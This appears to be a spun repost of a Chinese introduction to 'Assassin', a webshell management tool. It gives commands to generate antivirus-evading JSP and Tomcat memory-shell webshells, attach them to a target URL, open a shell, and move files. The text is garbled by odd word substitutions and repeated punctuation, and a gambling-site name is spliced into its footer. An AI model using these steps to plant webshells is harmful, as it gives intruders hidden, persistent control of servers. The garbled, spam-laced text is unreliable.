项目作者：b1ackc4t

项目地点：https://github.com/b1ackc4t/Assassin

一、工具先容

Assassin是一款精简的基于下令行的webshell治理工具，，，，，它有着多种payload发送方法和编码方法，，，，，以及精简的payload代码，，，，，使得它成为隐藏的谋害者，，，，，难以被很好的防御。。。。。。工具短小精悍，，，，，天生的webshell能够过常见杀软，，，，，只管镌汰了毗连后交互的流量特征，，，，，详细payload发送方法均可自界说。。。。。。由于小我私家精神有限（由于懒并且菜），，，，，服务端暂时仅支持Java。。。。。。

二、装置与使用

1、用startup.bat或startup.sh启动，，，，，之后会弹出窗口选择生涯位置

new java 123 cookie# 天生密码为123 发送方法为cookie的通俗jsp木马new java pass post reqEncode=base36 tamper=tomcat9_filter# 天生密码为pass 发送方法为post 请求用base36编码的tomcat9 filter内存马

2、将webshell上到目的服务器

add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36# 添加webshell 密码123 java马 cookie传参 请求编码默认base64 响应编码base36

3、show审查ID号

4、session 1毗连webshell

5、看到提醒符爆发转变就可以执行webshell controller commands的下令了

Assassin|java >getshell

Assassin|java|C:\apache-tomcat-9.0.54\bin >dir

6、上传文件

upload # 没参数默认传到目今目录，，，，，选择文件即可上传

7、下载文件

download ./test.txt同理

三、下载地点：

通过项目地点下载：

https://github.com/b1ackc4t/Assassin

四、声明：

仅供清静研究与学习之用，，，，，若将工具做其他用途，，，，，由使用者肩负所有执法及连带责任，，，，，作者不肩负任何执法及连带责任。。。。。。

TOPSEC

十年树木，，，，，百年树人。。。。。。未来，，，，，3377体育网官网入口将始终起劲探索，，，，，一直延展网络清静人才作育的宽度和深度，，，，，为网络清静人才作育与工业生长孝顺企业力量。。。。。。